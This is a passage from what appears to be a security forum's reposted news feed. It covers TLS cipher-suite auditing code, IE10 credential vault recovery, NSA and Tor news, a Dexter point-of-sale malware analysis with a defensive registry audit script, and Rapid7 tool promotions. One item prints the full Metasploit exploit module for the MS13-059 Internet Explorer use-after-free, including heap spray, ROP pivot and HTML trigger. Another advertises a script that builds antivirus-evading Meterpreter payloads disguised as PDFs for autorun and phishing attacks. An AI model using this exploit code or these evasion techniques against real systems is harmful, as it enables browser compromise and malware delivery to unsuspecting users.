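        issues.append("no-forward-secrecy")
    if p["cipher"].startswith("3DES"):
        issues.append("3des")
    return issues


def summarize(counts, dh_bits=1024):
    """Aggregate connection counts by key exchange and by issue; shares are
    fractions of all connections, rounded to three decimal places."""
    total = sum(counts.values())
    by_kx, by_issue = {}, {}
    for name, n in counts.items():
        p = parse_suite(name)
        kx = p["kx"] if p else "unknown"
        by_kx[kx] = by_kx.get(kx, 0) + n
        for issue in assess(name, dh_bits):
            by_issue[issue] = by_issue.get(issue, 0) + n
    return {
        "total": total,
        "share_by_kx": {k: round(v / total, 3) for k, v in by_kx.items()},
        "share_by_issue": {k: round(v / total, 3) for k, v in by_issue.items()},
    }


if __name__ == "__main__":
    for suite, n in sorted(SUITE_COUNTS.items(), key=lambda kv: -kv[1]):
        print("%6d  %-40s %s" % (n, suite, ", ".join(assess(suite)) or "ok"))
    print(summarize(SUITE_COUNTS))
```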
  12. You people are paranoid. Nobody attacked us, I was working on the server.
  13. Interesting. So RSA instead of ECDH.
  14. Yeah, yeah
  15. Password Algorithms: Internet Explorer 10 (Windows Vault) Introduction Microsoft added a new feature to Windows 7 called ‘Vault’ which you can access through the Credential Manager in control panel or vaultcmd from command line. It works very similar to Gnome Key Ring on Linux or the Apple Keychain on Mac OS. In versions 7, 8 and 9 of Internet Explorer, passwords were protected using DPAPI and the login URL as entropy before being saved in the registry. The new algorithm in IE10 continues to use DPAPI but the encryption of credentials is now handled by the Vault Service. Vault System Service Like most Windows Encryption, the protection of Vault data occurs within a LocalSystem service. vaultsvc.dll contains the service code and is loaded by the Local Security Account Subsystem (lsass.exe) at boot time. Between 18-24 functions (depending on OS) are exposed to clients over a local RPC end point. On Windows 7 is an additional KeyRing Credential UI application (VaultSysUI.exe) launched by the service if it requires information from the owner of a vault. For example, you have the ability to lock a vault with a password. You can also configure a vault to require permission from the user when an application attempts to access the password element. In both situations, VaultSysUI will display a window to the user and then write the response back to heap memory which Vault Service can access. Although both these features are useful and add further protection to a user’s credentials, they were removed in Windows 8 along with other functionality. Vault Client Library Access From the user session, RPC calls are made through API exported by vaultcli.dll Explorer.exe loads Credui.dll and Vault.dll when accessing the Credential Manager through the Control Panel. You can also use vaultcmd.exe to add/remove credentials but it doesn’t display passwords on either 7 or 8. On Windows 8 . . . 
For whatever reasons, there was a pretty significant reduction in Vault features between Windows 7 and 8. Below is a list of what was removed.

- Creation / deletion of vaults.
- Loading / unloading external vault files.
- Locking / unlocking vaults with additional password protection.

Protection Methods

Windows 7 has 2 methods available but Windows 8 only has 1. DPAPI (Data Protection API) is used by default, but on Windows 7 you can also use a password. The algorithm used to protect passwords is RSA PBKDF2.

Recovery of Web Credentials

As said, there were some changes to the Vault service between Windows 7 and 8. VaultGetItem requires an additional parameter on Windows 8 and the VAULT_ITEM structure has an extra property. Here's the structure for Windows 7:

typedef struct _VAULT_ITEM_W7 {
  GUID SchemaId;
  LPCWSTR pszCredentialFriendlyName;
  PVAULT_ITEM_ELEMENT pResourceElement;
  PVAULT_ITEM_ELEMENT pIdentityElement;
  PVAULT_ITEM_ELEMENT pAuthenticatorElement;
  FILETIME LastModified;
  DWORD dwFlags;
  DWORD dwPropertiesCount;
  PVAULT_ITEM_ELEMENT pPropertyElements;
} VAULT_ITEM_W7, *PVAULT_ITEM_W7;

And for Windows 8 . . .

typedef struct _VAULT_ITEM_W8 {
  GUID SchemaId;
  LPCWSTR pszCredentialFriendlyName;
  PVAULT_ITEM_ELEMENT pResourceElement;
  PVAULT_ITEM_ELEMENT pIdentityElement;
  PVAULT_ITEM_ELEMENT pAuthenticatorElement;
  PVAULT_ITEM_ELEMENT pPackageSid;
  FILETIME LastModified;
  DWORD dwFlags;
  DWORD dwPropertiesCount;
  PVAULT_ITEM_ELEMENT pPropertyElements;
} VAULT_ITEM_W8, *PVAULT_ITEM_W8;

I've written a tool to recover IE10 passwords using the Vault API; here's example output on a Windows 7 machine. For those of you that want to know more about the recovery process, you can grab the source and binary here. Because the Windows Vault Service remains undocumented, I can't guarantee the accuracy of the information provided.
The latest protection of Web Credentials for Internet Explorer is indeed weaker than the previous algorithm for 7, 8 and 9, but the upside is that with the Vault you can reliably backup/restore your passwords when needed. Below is just a list of API available/removed between Windows 7 and 8.

Credential Vault Client Library Function | Windows 7 | Windows 8
---------------------------------------- | --------- | ---------
VaultCreateItemType                      | Yes       | Yes
VaultDeleteItemType                      | Yes       | Yes
VaultEnumerateItemTypes                  | Yes       | Yes
VaultAddItem                             | Yes       | Yes
VaultFindItems                           | Yes       | Yes
VaultEnumerateItems                      | Yes       | Yes
VaultGetItem                             | Yes       | Yes
VaultRemoveItem                          | Yes       | Yes
VaultGetItemType                         | Yes       | Yes
VaultOpenVault                           | Yes       | Yes
VaultCloseVault                          | Yes       | Yes
VaultGetInformation                      | Yes       | Yes
VaultEnumerateVaults                     | Yes       | Yes
VaultSetInformation                      | Yes       | No
VaultCreateVault                         | Yes       | No
VaultCopyVault                           | Yes       | No
VaultDeleteVault                         | Yes       | No
VaultLoadVaults                          | Yes       | No
VaultUnloadVaults                        | Yes       | No
VaultCopyItem                            | Yes       | No
VaultMoveItem                            | Yes       | No
VaultLockVault                           | Yes       | No
VaultUnlockVault                         | Yes       | No
VaultConfirmVaultAccess                  | Yes       | No
VaultEnumerateSettingUnits               | No        | Yes
VaultGetSettingUnit                      | No        | Yes
VaultApplySettingUnit                    | No        | Yes
VaultRemoveSettingUnit                   | No        | Yes
VaultTriggerSync                         | No        | Yes

Sursa: Password Algorithms: Internet Explorer 10 (Windows Vault) | Insecurety Research
  16. September 5, 2013
The NSA Is Breaking Most Encryption on the Internet

The new Snowden revelations are explosive. Basically, the NSA is able to decrypt most of the Internet. They're doing it primarily by cheating, not by mathematics. It's joint reporting between the Guardian, the New York Times, and ProPublica. I have been working with Glenn Greenwald on the Snowden documents, and I have seen a lot of them. These are my two essays on today's revelations. Remember this: The math is good, but math has no agency. Code has agency, and the code has been subverted.

Sursa: Schneier on Security: The NSA Is Breaking Most Encryption on the Internet
  17. TOR Should not be solely Used for privacy
Posted by: FastFlux September 5, 2013

The Tor network has been getting a lot of attention lately. About two weeks ago, the number of users on the anonymous network mysteriously doubled, hitting a record high. It could be because of the Pirate Bay's new Tor-powered browser. It could also be a result of recent web censorship by the Russian government. Or it could be new malware that is utilizing the network to hide its Command and Control (C&C) servers.

A new report from the US Naval Research Laboratory and Georgetown University in Washington DC is called "Users Get Routed: Traffic Correlation on Tor by Realistic Adversaries." Researchers claim that it is not very difficult to expose the bulk of users' identities if an attacker is willing to put in the time and effort, according to the Register. It's even easier for government and spy agencies that have the money to do so.

So, how bad is the security risk? The study found that even if an attacker had no control of routers, 80 percent of Tor users could be de-anonymized within six months. With control of one exchange point, or autonomous system (AS), around 100 percent of users were likely to be uncovered within three months. With two, it could take just one day. "These results are somewhat gloomy for the current security of the Tor network," researchers wrote, adding that "Current users of Tor should carefully consider if it meets their security needs."

Sursa: TOR Should not be solely Used for privacy - http://zerosecurity.org/technews/tor-solely-privacy
  18. Point-of-Sale Malware: Infostealer.Dexter

Haven't posted in a while, so let's do something... Back to some old material, due to a 'recent' compromise of off-sho.re servers and the circulation between AVs of Cyberbunker sinkhole logs. (Especially the Alina connections were interesting, but that's not the topic.)

Do you remember Dexter? Nah, not the TV series, but the PoS malware. Systems infected by Dexter are varied in our case (gas stations, pawn shops, logistics, luxury shops, doctors, clinics, pharma, labs, etc.). This malware was coded by a guy known as 'dice' (there was an advert on Darkode made by him around November 2012 if I remember, but he requested an admin to remove the thread so it's no longer available). Visa USA released an alert one month after.

Sample which came from the compromised server:

Let's see then; I will spare you the Visual Basic 6 unpacking step. If you want the hashes:
Original: bb0b17c2f66a868cf1e8a46626366a32
Depack: e74593552b66a4638b80a4fbf2fb7438

Create a mutex:
Determine if we are under x64:
Create a suspended process of IE:
Copy the EXE in memory:
WriteProcessMemory on Internet Explorer with the content of the exe:
Then it does a CreateRemoteThread on IE and ExitThread on this process.

OK, what happens with the injected IE? I've patched the executable by taking some jumps it did not take at the beginning, to make it think we are in IE and see what happens.

Create a subkey 'HelperSolutions Software':
Create a folder %APPDATA%/Java Security Plugin, then CopyFile and DeleteFile on the original exe.
Do a RegCreateKey/RegSetValue/RegCloseKey with 'digit' as registry entry and 'cc98afca-1a04-4c5d-80cf-1cc78244b63e' as value for me.
Create a registry persistence entry 'Sun Java Security Plugin':
Do the same but this time in HKCU:
Create another registry entry, but this time: HKCU Software\Microsoft\Windows\CurrentVersion\Policies\Associations with 'LowRiskFileTypes' and '.exe;.bat;.reg;.vbs;' as value.
The 'Policies\Associations' subkey lets you manage the default risk level for file attachments (low-risk/medium-risk/high-risk file types). The attachment manager in Windows can help protect your computer from unsafe attachments that you might receive with an e-mail message and from unsafe files that you might save from the Internet.
Edit a value at HKCU: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0, registry entry '1806' with '0' as value.
'1806' is the registry entry about launching applications and unsafe files in Internet Explorer. The value can be zero, one, or three; typically, a setting of zero sets a specific action as permitted, a setting of one causes a prompt to appear, and a setting of three prohibits the specific action.
Do the same operation but in HKLM this time:
The file initialises a thread:
Extract a resource:
Create a DLL 'SecureDll.dll' with the extracted resource and attribute Hidden:
Load the DLL:
Create a path:
Create a reg key at Software\HelperSolutions Software 'val1' with value 'C:\Documents and Settings\Administrateur\Bureau\strokes.log'
Create a second reg key at Software\HelperSolutions Software 'val2' with value 'C:\Documents and Settings\Administrateur\Bureau\tmp.log'
Hook the keyboard:
Refer to the MSDN for explanation:

Okay... let's have a look at what this SecureDll.dll does; it seems it's not that secure.
Look for the previous reg keys: val1 and val2.
Look for some specific processes running on the system. Here is the list:
wmiprvse.exe (Microsoft Windows Management Instrumentation)
LogonUI.exe (Windows LogOn User Interface)
svchost.exe (Service Host Process)
iexplore.exe (Internet Explorer)
explorer.exe (generic Windows process)
System (Internal Windows system process)
smss.exe (Session Management Subsystem)
csrss.exe (Client/Server Runtime Subsystem)
winlogon.exe (Windows LogOn Process)
lsass.exe (Local Security Authority Subsystem Service)
spoolsv.exe (Printer Spooler Service)
alg.exe (Application Layer Gateway)
wuauclt.exe (Windows Update client for WindowsME)
firefox.exe
chrome.exe
devenv.exe (Microsoft Visual Studio)

Then it starts to open processes and look for track1/2/3.
And when finally something is detected:
Make it a string:
After looking at all processes it will create some threads:
The first will just do a new scan of processes.
The second thread makes sure everything is OK with the registry key 'run'.
The third loops to detect if the PC is going to shut down (I've not looked, but DetectShutdownClass seems explicit enough).
Then it starts to enter a procedure to call home:
Get user name:
Get the computer name:
Get the OS version:
Architecture:
Retrieve the string used to identify the machine which was stored in the registry database (cc98afca-1a04-4c5d-80cf-1cc78244b63e)
Open strokes.log and read it
Then delete it:
Read the content of tmp.log:
Enter a decode routine:
Create a file Debug.log:
Write it:
And delete tmp.log:
Take our hwid and enter the routine to encode it:
Then it will do that again, but with the process name where it grabbed the track info; it also takes PC info, etc...

From the original source code:
At the end we have a huge string like:
page=RUUZTk9FSURRTk1OHVFIGBhJUUQYRUpRSkQaTUwYSUhNTx0f&ump=ACgZHREqFRkLGQ4jLxkOChUfGVIZBBlGR0hNTU1NTU1NTU1NTU1NTU1BTU9MS01MTUxMTExMTExMTExKSkpDWT5ITU1NTU1NTU1NTU1NTU1NIiQlMDU+MyRTMD0+L1wxLiJNT0xLTUxNTExMTExMTExMTExMTExMTExMTExKSkpMTE
The C&C domain and gate path are given via pointers due to the Internet Explorer injection.
After having called the gateway, Dexter does a 600000 ms sleep (10 mins):
And does the shit again, then calls home again every 10 mins.

Now about the C&C responses, I noticed these actions:
update-
chekin:
scanin:
unistall
download-
I've not researched how the following commands work; Josh Grunzweig of SpiderLabs already explained it.

So... enough boring reversing info, let's have a look at the panel now.
Login:
Dashboard:
More than 3000 bots, most of them are commercial machines.
Like Alina, Dexter uses colour codes: dead bots appear in red and recently dead bots in blue:
Dumps (stolen credit cards):
Keylogger logs (here, that seems to be a UPS dispatch center, or something like this):
Process viewer (not working):
Another but small Dexter panel:
I've also found an older version of Dexter; I thought it was Alina at first, but nope, Dexter v1:
Dashboard:
Dumps:
Bots:
Process list (this time it works):
Uploader was not found due to a programming error:
Dexter 'v2' C&C structure:
Just ignore the 'installer' folder, that's something homemade for a video.
Get track type function:
That even grabs track3.

600 posts reached
Posted by Steven K at 23:09
Sursa: XyliBox: Point-of-Sale Malware: Infostealer.Dexter
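As an added example (not part of the XyliBox post), a read-only PowerShell audit that checks a host for the persistence and configuration artefacts the analysis above attributes to Dexter. The post does not say which hive holds the 'HelperSolutions Software' key, so both HKCU and HKLM are assumed; the zone 1806 check is a weak signal on its own.

```powershell
# Added example, not from the XyliBox write-up: read-only audit for the host
# artefacts the analysis attributes to Dexter. Assumptions: the hive of the
# 'HelperSolutions Software' key is not given, so HKCU and HKLM are both
# checked; value names, paths and the Run entry name are as stated in the post.
# Run from an elevated PowerShell so that HKLM and all profiles are readable.

$findings = New-Object System.Collections.Generic.List[object]

function Add-Finding([string]$Indicator, [string]$Location, $Value) {
    $findings.Add([pscustomobject]@{
        Indicator = $Indicator
        Location  = $Location
        Value     = "$Value"
    })
}

foreach ($hive in 'HKLM', 'HKCU') {
    # 1. Persistence: Run entry named 'Sun Java Security Plugin' (HKLM first, then HKCU)
    $run = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
    $v = Get-ItemProperty -Path $run -Name 'Sun Java Security Plugin' -ErrorAction SilentlyContinue
    if ($v) { Add-Finding 'Run key persistence' $run $v.'Sun Java Security Plugin' }

    # 2. Bot configuration key: 'digit' (machine id), 'val1'/'val2' (keystroke and temp log paths)
    $cfg = "${hive}:\Software\HelperSolutions Software"
    if (Test-Path -LiteralPath $cfg) {
        Add-Finding 'Config key present' $cfg ''
        $p = Get-ItemProperty -LiteralPath $cfg
        foreach ($name in 'digit', 'val1', 'val2') {
            if ($null -ne $p.$name) { Add-Finding "Config value $name" $cfg $p.$name }
        }
        # val1/val2 point at the logs written by the keylogger DLL; report them if present on disk
        foreach ($name in 'val1', 'val2') {
            if ($p.$name -and (Test-Path -LiteralPath $p.$name)) {
                $size = (Get-Item -LiteralPath $p.$name -Force).Length
                Add-Finding "Log file referenced by $name" $p.$name "$size bytes"
            }
        }
    }

    # 3. Attachment Manager weakened: .exe added to LowRiskFileTypes
    $assoc = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Policies\Associations"
    $lr = Get-ItemProperty -Path $assoc -Name 'LowRiskFileTypes' -ErrorAction SilentlyContinue
    if ($lr -and $lr.LowRiskFileTypes -match '\.exe') {
        Add-Finding 'LowRiskFileTypes includes .exe' $assoc $lr.LowRiskFileTypes
    }

    # 4. IE zone 0 action 1806 (launching applications and unsafe files) set to 0 = permitted.
    #    Weak signal on its own; only meaningful together with the findings above.
    $zone0 = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"
    $z = Get-ItemProperty -Path $zone0 -Name '1806' -ErrorAction SilentlyContinue
    if ($z -and $z.'1806' -eq 0) { Add-Finding 'Zone 0 action 1806 = 0' $zone0 $z.'1806' }
}

# 5. Dropped copy of the sample and the hidden SecureDll.dll keylogger
$drop = Join-Path $env:APPDATA 'Java Security Plugin'
if (Test-Path -LiteralPath $drop) {
    Get-ChildItem -LiteralPath $drop -Force -ErrorAction SilentlyContinue | ForEach-Object {
        Add-Finding 'File in drop folder' $_.FullName ('{0} bytes, {1}' -f $_.Length, $_.Attributes)
    }
}
Get-ChildItem -Path $env:APPDATA -Filter 'SecureDll.dll' -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Finding 'Hidden keylogger DLL' $_.FullName $_.Attributes }

if ($findings.Count -eq 0) {
    Write-Output 'No Dexter artefacts found.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

The script only reads; once artefacts are confirmed, the Run entry and the config key are the first things to remove, and the log paths in val1/val2 show what was captured.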
  19. Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow
Authored by Vitaliy Toropov | Site packetstormsecurity.com

A heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. The exploit for this vulnerability is JavaScript code which shows how to use it for memory corruption of internal JS objects (Uint32Array, etc.) and subsequent arbitrary code execution (custom ARM/x64 payloads can be pasted into the JS code). This exploit affects Apple Safari version 6.0.1 for iOS 6.0 and OS X 10.7/8. Earlier versions may also be affected. It was obtained through the Packet Storm Bug Bounty program.

Download: http://packetstormsecurity.com/files/download/123088/PSA-2013-0903-1-exploit.tgz

Sursa: Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow | Packet Storm
  20. MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free
Authored by corelanc0d3r, sinn3r | Site metasploit.com

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: this Metasploit module can be used against version 9.0.8112.16446, but not 9.0.8112.16421. IE 8 requires a different way to trigger the vulnerability, which is not currently covered by this module. The issue is specific to the browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the content editable mode must be enabled. An "onmove" event handler is also necessary to be able to trigger the bug, and the event will be run twice before the crash. The first time is due to the position change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable' object is created during a "SelectAll" command, and this object will be used later on for the crash. The second onmove event seems to be triggered by an InsertButton (or Insert-whatever) command, which is also responsible for the free of the CFlatMarkupPointer object during page rendering. The EnsureRecalcNotify() function will then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and then passes this on to the next functions (GetLineInfo -> QIClassID). When this reference arrives in function QIClassID, an access violation finally occurs when the function is trying to call QueryInterface() with the bad reference, and this results in a crash. Successful control of the freed memory may leverage arbitrary code execution under the context of the user. Note: it is also possible to see a different object being freed and used; it doesn't always have to be CFlatMarkupPointer.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",
      'Description'    => %q{
        This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems
        to only affect certain releases of mshtml.dll. For example: This module can be used against
        version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8 requires a different way to trigger
        the vulnerability, but not currently covered by this module. The issue is specific to the
        browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the content
        editable mode must be enabled. An "onmove" event handler is also necessary to be able to
        trigger the bug, and the event will be run twice before the crash. The first time is due to the
        position change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'
        object is created during a "SelectAll" command, and this object will be used later on for the
        crash. The second onmove event seems to be triggered by a InsertButton (or Insert-whatever)
        command, which is also responsible for the free of object CFlatMarkupPointer during page
        rendering. The EnsureRecalcNotify() function will then still return an invalid reference to
        CFlatMarkupPointer (stored in EBX), and then passes this on to the next functions (GetLineInfo
        -> QIClassID). When this reference arrives in function QIClassID, an access violation finally
        occurs when the function is trying to call QueryInterface() with the bad reference, and this
        results a crash. Successful control of the freed memory may leverage arbitrary code execution
        under the context of the user. Note: It is also possible to see a different object being freed
        and used, doesn't always have to be CFlatMarkupPointer.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'corelanc0d3r', # Vuln discovery, PoC
          'sinn3r'        # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3184' ],
          [ 'OSVDB', '96182' ],
          [ 'MSB', 'MS13-059' ],
          [ 'BID', '61668' ],
          [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-194/' ],
          [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-195/' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Vulnerable IE9 tested: 9.0.8112.16446
          [ 'Automatic', {} ],
          [ 'IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)', {} ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Privileged'     => false,
      'DisclosureDate' => "Jun 27 2013",
      'DefaultTarget'  => 0))
  end

  def rnd_dword
    rand_text_alpha(4).unpack("V").first
  end

  def get_fake_obj
    # edx,dword ptr [eax]
    # ...
    # call edx
    obj = [0x20302020].pack("V*") # EAX points to this (Target spray 0x20302020)
    obj << [rnd_dword].pack("V*")
    obj << [rnd_dword].pack("V*")
    obj << [rnd_dword].pack("V*")
    obj << [rnd_dword].pack("V*")
    return obj
  end

  # Target spray 0x20302020
  # ESI is our fake obj, with [esi]=0x20302020, [esi+4]=0x42424242, so on
  # eax=20302020 ebx=80004002 ecx=0250d890 edx=cccccccc esi=03909b68 edi=0250d8cc
  # eip=cccccccc esp=0250d87c ebp=0250d8a8 iopl=0 nv up ei ng nz na po cy
  # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010283
  # cccccccc ?? ???
  def get_payload
    code = ''
    code << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
    code << "\x61\x9d"                 # popad; popfd
    code << payload.encoded

    stack_pivot = [
      0x7c342643, # xchg eax, esp; pop edi; add [eax], al, pop ecx; ret
      0x0c0c0c0c
    ].pack("V*")

    p = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    return p
  end

  def is_win7_ie9?(agent)
    (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/)
  end

  # The meta-refresh seems very necessary to make the object overwrite more reliable.
  # Without it, it only gets about 50/50
  def get_html(cli, req)
    js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj, ::Rex::Arch.endian(target.arch))
    js_payload  = ::Rex::Text.to_unescape(get_payload, ::Rex::Arch.endian(target.arch))

    html = %Q|
    <html>
    <meta http-equiv="X-UA-Compatible" content="IE=7"/>
    <meta http-equiv="refresh" content="2"/>
    <head>
    <script language='javascript'>
    #{js_property_spray}
    var fake_obj = unescape("#{js_fake_obj}");
    var s = unescape("#{js_payload}");
    sprayHeap({shellcode:s});

    function setupPage() {
      document.body.style.position = 'absolute';
      document.body.contentEditable = 'true';
      document.body.style.right = '1';
    }

    function hitMe() {
      document.execCommand('SelectAll');
      document.execCommand('InsertButton');
      sprayHeap({shellcode:fake_obj, heapBlockSize:0x10});
      document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}';
    }
    </script>
    </head>
    <body onload="setupPage()" onmove="hitMe()" />
    </html>
    |

    html.gsub(/^\t\t/, '')
  end

  def on_request_uri(cli, request)
    if is_win7_ie9?(request.headers['User-Agent'])
      print_status("Sending exploit...")
      send_response(cli, get_html(cli, request), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
    else
      print_error("Not a suitable target: #{request.headers['User-Agent']}")
      send_not_found(cli)
    end
  end
end

Sursa: MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free | Packet Storm
  21. Federal Friday - 8/30/2013: DHS/FBI Highlight The Importance Of Keeping Android Devices Updated
Posted by Sajal Sahay in Information Security on Aug 30, 2013 3:08:58 PM

A memo sent to police, fire and EMS personnel nationwide from the FBI and Department of Homeland Security earlier this summer was recently made public. According to the memo, the Android operating system is the primary target for mobile malware attacks. At face value, this would not be surprising given that Android commands ~80% market share in the US, so it should proportionally experience the largest number of malware attacks. However, the same report says that iOS was targeted <1% of the time, which is well below Apple's market share. So, what's the difference?

The real insight comes later in the report. "Industry reporting indicates 44% of Android users are still using versions 2.3.3 through 2.3.7 – known as Gingerbread – which were released in 2011 and have a number of security vulnerabilities that were fixed in later versions." Rapid7's mobile customer database shows that 49% of Android devices contain at least one high severity vulnerability, aligning closely with the percentage of devices with older versions of the OS still running on them.

So, the most effective way for organizations to eliminate these vulnerabilities is to ensure all employee devices are updated to the latest OS version. However, because the mobile ecosystem is so complex and OS updates require coordination between handset manufacturers, OS vendors and carriers, these updates can sometimes take months to deploy and create large windows of risk. Even the ACLU has gotten involved, accusing the major US carriers of deceptive business practices due to untimely updates of Android devices. See our previous blog on this topic.

Rapid7 has an answer to this problem. Our Mobilisafe mobile risk management solution makes it easy for organizations to help their employees update their devices.
Mobilisafe identifies the mobile devices connecting to organizational data, and assesses each device for its vulnerability risk and if they are eligible for an OS update. For those devices that can be updated, Mobilisafe automatically sends emails to the employee, with direct links to the OEM site where the device update can be completed. Policies can also be created that block devices from accessing organizational data if the update is not completed within a set period of time. For a free demo of Mobilisafe, click here, and our usual Federal Blogger John Schimelpfenig will be back next week. Sursa: https://community.rapid7.com/community/infosec/blog/2013/08/30/dhsfbi-highlight-the-importance-of-keeping-android-devices-updated
  22. Rapid7 Free Tools - Download Today!
Posted by Patrick Hellen in Information Security on Aug 30, 2013 12:06:08 PM

Hello all,

It's your friendly neighborhood Community Manager again, this time reaching out to talk about something that should be of interest to all of you: Rapid7's suite of Free Security Tools. If you're a one-man shop trying to make sure you're as buttoned up as possible, or a giant organization just looking to do some validation and double checking, I'm sure one or more of these tools would be an excellent addition to your existing security portfolio. Here's a list of our own portfolio. Click on the links to get some additional information, and to download the licenses.

Nexpose Community Edition: Our original tool - Nexpose is vulnerability scanning software that is the best in the business. Don't take my word for it though. To see how excellent it is, download the community edition and test it out for yourself, on your own networks. We're pretty sure that if you're looking for an enterprise tool, the taste test available with the community edition will be more than enough to prove its value.

Metasploit Community Edition: Metasploit, our penetration testing tool, is the perfect piece of software for both pen testing your networks and validating the findings of your latest vulnerability scan. Also, if you're looking to teach yourself how to be a pen tester, the only way to learn, really, is to do. Download our community edition, start your testing, and interact with other pen testers here on SecurityStreet to learn more.

Mobilisafe 14-day Trial: Are you looking to better understand the risks that you're facing with BYOD? Want to mitigate the risks associated with employees who keep forgetting to update or patch their own devices? Try out our free Mobilisafe 14-day trial, and learn how easy it is to keep the risk of the mobile devices on your network low.

RiskRater: Our newest free tool, RiskRater, is a survey that will measure your mobile, endpoint, and user-based risk in comparison to industry benchmarks. We asked, and over 600 organizations answered our 18-question survey, to help us set up the benchmarks. You can use this tool to see how your own security stance and configurations compare. Also, each question you answer provides you with real and actionable follow-up tasks that can help address the risk that you helped expose in your survey. We're not going to save or share your information, and there's nothing to download - just click to launch the tool, and get a good spot check on your real risk.

Metasploitable: If you're new to penetration testing, and you're just starting to learn Metasploit, you don't want to test something out on your production network. Having to explain to your boss why critical system #1 is down is not an ideal conversation to have. To address this, the Metasploit team developed Metasploitable. This is a safe, intentionally vulnerable virtual machine that you can run pen tests against to make sure you understand how to best use the exploits at your disposal. The Metasploit team calls it a "pen test in a box," so if you'd like to try it out, please download our VMware virtual machine here and get started.

ScanNow - MySQL: The MySQL vulnerability CVE-2012-2122, best described in HD Moore's post here, is quite a risk, allowing every 256th login regardless of password. If you'd like to quickly and easily check to see if your MySQL servers are vulnerable, just click, download and run the test yourself.

ScanNow - UPnP: This free ScanNow scanner checks your network-enabled devices to see if they are vulnerable to an attack via UPnP. This blog and whitepaper from Rapid7 and HD Moore estimate upwards of 50 million network devices are at risk because of vulnerabilities found in this protocol. Click and download this free tool to see if you're one of the millions of people affected by this, and what you can do to make sure you close this potentially damaging security flaw.

UPnP Router Check: Want a quick router scan to check on the status of UPnP-enabled devices? Click here and run a scan quickly and easily. This will only check your router exposure, so make sure to download the free ScanNow UPnP tool listed above to check your internal status.

And finally, BrowserScan: This free tool enables your organization to check on the browsers currently in use, allows you to identify the risk of out-of-date items and unpatched plug-ins, and can even restrict access to sensitive information until a fix or upgrade is secured. It's as simple as embedding a tracking code on your internal site to look up all the browsers in use, and it can even return analytics to show you how you're addressing your risk over time.

I also recommend that you check out Kali Linux by Offensive Security, the same team that brought you BackTrack. Kali Linux, the upgraded BackTrack, is a Debian-derived Linux distribution that was designed for both pen testing and digital forensics. Kali is full of open source tools that you can use to test your own networks, including nmap, Wireshark, John the Ripper, and Aircrack-ng. Due to a partnership between Offensive Security and Rapid7, a specially designed license of Metasploit is available as an internal component of the download. Visit Offensive Security to learn more.

All of these tools, as I mentioned, are 100% free to download and use. Most of them are so user-friendly that it can take as little as 10 seconds in some cases to find out your level of risk regarding a specific vulnerability. My own philosophy on using these tools? If anything can make it harder for an attacker to gain access, then it's worth taking a shot, and if it's free, it's worth a small amount of your time, isn't it?

Now I know that's a lot to take in and review, so if you've got any questions about these products - or if you're currently using them and you'd be willing to share some of your best practices or tips on how they've worked successfully in your own environments - please let us know! You can drop us a line here, and include some info on what you're working on, and we would love to discuss any findings or feedback you have. Finally, if you've got a great idea for another free tool that we could develop, please let us know. Who knows? If we do design it, maybe we'll name it after you?

Thanks all, and feel free to drop me a line here if you'd like to discuss offline.

Patrick Hellen

Sursa: https://community.rapid7.com/community/infosec/blog/2013/08/30/rapid7-free-tools--download-today
  23. AV0id – Anti-Virus Bypass Metasploit Payload Generator Script by Common Exploits Introducing a simple script I have created to bypass most Anti-Virus products. This script is based on scripts I used whilst attempted to avoid A.V, credit to all authors of the mentioned scripts below for their research and work. This was just a very quick script I put together to make life a bit easier. What it does it generator a Metasploit Meterpreter payload executable automatically for you. It auto changes the icon to a PDF and also auto creates AutoRun files. So you can then use this file via a shell upload to get a reverse shell via Metasploit, place on a USB stick for some social engineering/Phishing attacks, or burn to a CDROM for some AutoRun fun. There are many good tools/scripts around, but a lot of these are now detected by most Anti-Virus products. On a recent laptop assessment I was getting blocked by McAfee attempting a AutoRun exploit and most tools and encoding would not get round this, so I decided to knock up a quite script that did get round it. Even if you are not looking to get around A.V, or this gets detected more in the future it is a very easy script to generate you a quick Meterpreter payload for your local or remote listener. 